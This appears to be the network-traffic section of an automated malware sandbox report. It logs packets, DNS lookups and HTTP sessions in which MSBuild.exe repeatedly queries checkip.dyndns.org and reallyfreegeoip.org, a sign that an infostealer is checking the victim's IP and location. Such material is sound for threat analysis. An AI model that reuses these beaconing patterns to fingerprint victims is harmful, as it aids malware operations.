Jul 27, 2024 11:39:02.521009922 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.521034002 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.521056890 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.521122932 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.521140099 CEST	443	49731	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:02.521150112 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:02.521182060 CEST	49731	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:03.130156040 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:03.135104895 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:03.135169029 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:03.135523081 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:03.148968935 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:04.506027937 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 27, 2024 11:39:06.033034086 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:06.040359974 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:06.045588017 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:07.689614058 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:07.740293026 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:07.754895926 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:07.754923105 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:07.754995108 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:07.763428926 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:07.763447046 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.273577929 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.273720026 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.280014038 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.280025959 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.280356884 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.334053993 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.339713097 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.384496927 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.465465069 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.465553045 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.465610027 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.471746922 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.474976063 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:08.480046988 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:08.662942886 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:08.666317940 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.666363001 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.666559935 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.668504000 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:08.668520927 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:08.709919930 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:10.107799053 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:10.109572887 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:10.109597921 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:10.262206078 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:10.262442112 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:10.262520075 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:10.262955904 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:10.266041040 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:10.267195940 CEST	49735	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:10.275019884 CEST	80	49735	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:10.275115967 CEST	49735	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:10.275222063 CEST	49735	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:10.275248051 CEST	80	49732	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:10.275300980 CEST	49732	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:10.279922962 CEST	80	49735	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:11.912939072 CEST	80	49735	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:11.914244890 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:11.914293051 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:11.914366007 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:11.914608955 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:11.914618969 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:11.959037066 CEST	49735	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:12.429239035 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:12.430901051 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:12.430921078 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:12.575180054 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:12.575413942 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:12.575474977 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:12.575788975 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:12.580394983 CEST	49737	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:12.588290930 CEST	80	49737	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:12.588396072 CEST	49737	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:12.588500023 CEST	49737	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:12.596921921 CEST	80	49737	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:15.003487110 CEST	80	49737	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:15.004801989 CEST	49738	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:15.004848957 CEST	443	49738	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:15.005017042 CEST	49738	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:15.005489111 CEST	49738	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:15.005501986 CEST	443	49738	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:15.053112030 CEST	49737	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:15.489648104 CEST	443	49738	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:15.492516994 CEST	49738	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:15.492552042 CEST	443	49738	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:15.631458998 CEST	443	49738	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:15.631704092 CEST	443	49738	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:15.631788015 CEST	49738	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:15.632116079 CEST	49738	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:15.635015011 CEST	49737	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:15.635976076 CEST	49739	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:15.640507936 CEST	80	49737	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:15.640578032 CEST	49737	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:15.640984058 CEST	80	49739	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:15.641060114 CEST	49739	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:15.641138077 CEST	49739	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:15.646049023 CEST	80	49739	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:18.317209959 CEST	80	49739	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:18.365309954 CEST	49739	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:18.536145926 CEST	49739	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:18.537261963 CEST	49741	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:18.541646004 CEST	80	49739	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:18.541696072 CEST	49739	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:18.542210102 CEST	80	49741	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:18.542944908 CEST	49741	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:18.543317080 CEST	49741	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:18.548137903 CEST	80	49741	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:19.278050900 CEST	80	49741	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:19.279592991 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:19.279645920 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:19.279927015 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:19.279927015 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:19.279968977 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:19.320507050 CEST	49741	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:19.819269896 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:19.820880890 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:19.820914030 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:19.973328114 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:19.973584890 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:19.973716974 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:19.974061966 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:19.977116108 CEST	49741	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:19.978203058 CEST	49746	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:20.018923044 CEST	80	49741	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:20.018940926 CEST	80	49746	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:20.019054890 CEST	49741	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:20.019069910 CEST	49746	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:20.019205093 CEST	49746	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:20.036623001 CEST	80	49746	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:22.027405024 CEST	49723	80	192.168.2.4	199.232.214.172
Jul 27, 2024 11:39:22.040047884 CEST	80	49723	199.232.214.172	192.168.2.4
Jul 27, 2024 11:39:22.040116072 CEST	49723	80	192.168.2.4	199.232.214.172
Jul 27, 2024 11:39:22.288875103 CEST	80	49746	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:22.290345907 CEST	49749	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:22.290395975 CEST	443	49749	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:22.290524006 CEST	49749	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:22.290725946 CEST	49749	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:22.290734053 CEST	443	49749	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:22.334073067 CEST	49746	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:22.772665024 CEST	443	49749	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:22.781184912 CEST	49749	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:22.781209946 CEST	443	49749	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:22.917249918 CEST	443	49749	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:22.917541981 CEST	443	49749	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:22.917606115 CEST	49749	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:22.918203115 CEST	49749	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:22.920897961 CEST	49746	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:22.921808958 CEST	49750	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:22.928246021 CEST	80	49746	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:22.928262949 CEST	80	49750	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:22.928309917 CEST	49746	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:22.928339005 CEST	49750	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:22.928464890 CEST	49750	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:22.933420897 CEST	80	49750	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:24.345159054 CEST	80	49750	193.122.6.168	192.168.2.4
Jul 27, 2024 11:39:24.350128889 CEST	49751	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:24.350188971 CEST	443	49751	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:24.350269079 CEST	49751	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:24.350497007 CEST	49751	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:24.350513935 CEST	443	49751	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:24.396593094 CEST	49750	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:39:24.824812889 CEST	443	49751	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:24.832823038 CEST	49751	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:24.832837105 CEST	443	49751	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:24.962956905 CEST	443	49751	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:24.963205099 CEST	443	49751	188.114.96.3	192.168.2.4
Jul 27, 2024 11:39:24.963277102 CEST	49751	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:39:24.963692904 CEST	49751	443	192.168.2.4	188.114.96.3
Jul 27, 2024 11:40:10.211182117 CEST	49724	80	192.168.2.4	199.232.214.172
Jul 27, 2024 11:40:10.217834949 CEST	80	49724	199.232.214.172	192.168.2.4
Jul 27, 2024 11:40:10.218014956 CEST	49724	80	192.168.2.4	199.232.214.172
Jul 27, 2024 11:40:16.967448950 CEST	80	49735	193.122.6.168	192.168.2.4
Jul 27, 2024 11:40:16.968373060 CEST	49735	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:40:29.346906900 CEST	80	49750	193.122.6.168	192.168.2.4
Jul 27, 2024 11:40:29.347013950 CEST	49750	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:41:04.350128889 CEST	49750	80	192.168.2.4	193.122.6.168
Jul 27, 2024 11:41:04.355201960 CEST	80	49750	193.122.6.168	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:38:59.855787992 CEST	52016	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:38:59.931802034 CEST	53	52016	1.1.1.1	192.168.2.4
Jul 27, 2024 11:39:03.115674019 CEST	53503	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:39:03.123480082 CEST	53	53503	1.1.1.1	192.168.2.4
Jul 27, 2024 11:39:07.745228052 CEST	52755	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:39:07.754160881 CEST	53	52755	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 11:38:59.855787992 CEST	192.168.2.4	1.1.1.1	0x2180	Standard query (0)	investdirectinsurance.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:03.115674019 CEST	192.168.2.4	1.1.1.1	0x3eee	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:07.745228052 CEST	192.168.2.4	1.1.1.1	0x6345	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 11:38:59.931802034 CEST	1.1.1.1	192.168.2.4	0x2180	No error (0)	investdirectinsurance.com		172.67.189.102	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:38:59.931802034 CEST	1.1.1.1	192.168.2.4	0x2180	No error (0)	investdirectinsurance.com		104.21.65.79	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:03.123480082 CEST	1.1.1.1	192.168.2.4	0x3eee	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:39:03.123480082 CEST	1.1.1.1	192.168.2.4	0x3eee	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:03.123480082 CEST	1.1.1.1	192.168.2.4	0x3eee	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:03.123480082 CEST	1.1.1.1	192.168.2.4	0x3eee	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:03.123480082 CEST	1.1.1.1	192.168.2.4	0x3eee	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:03.123480082 CEST	1.1.1.1	192.168.2.4	0x3eee	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:07.754160881 CEST	1.1.1.1	192.168.2.4	0x6345	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:07.754160881 CEST	1.1.1.1	192.168.2.4	0x6345	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:20.663800001 CEST	1.1.1.1	192.168.2.4	0x6337	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:39:20.663800001 CEST	1.1.1.1	192.168.2.4	0x6337	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:32.701962948 CEST	1.1.1.1	192.168.2.4	0xec87	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:39:32.701962948 CEST	1.1.1.1	192.168.2.4	0xec87	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

investdirectinsurance.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	193.122.6.168	80	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:39:03.135523081 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:39:06.033034086 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ce2203ea33006bd4376d524c647baaa1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 27, 2024 11:39:06.040359974 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 27, 2024 11:39:07.689614058 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d06a7320ebfee4bb09f7fab1bf0c223f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 27, 2024 11:39:08.474976063 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 27, 2024 11:39:08.662942886 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cc35f71cd90fb8df548f034dda8275bf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	193.122.6.168	80	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:39:10.275222063 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 27, 2024 11:39:11.912939072 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a4b6d5445af2a463ff80cef0f708c568 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	193.122.6.168	80	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:39:12.588500023 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:39:15.003487110 CEST	320	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: aa8d28adc47c9426206f5b7a763cf586 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	193.122.6.168	80	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:39:15.641138077 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:39:18.317209959 CEST	730	IN	HTTP/1.1 502 Bad Gateway Date: Sat, 27 Jul 2024 09:39:18 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: e3b6e3140b181a01010bbfab9802a677 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	193.122.6.168	80	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:39:18.543317080 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
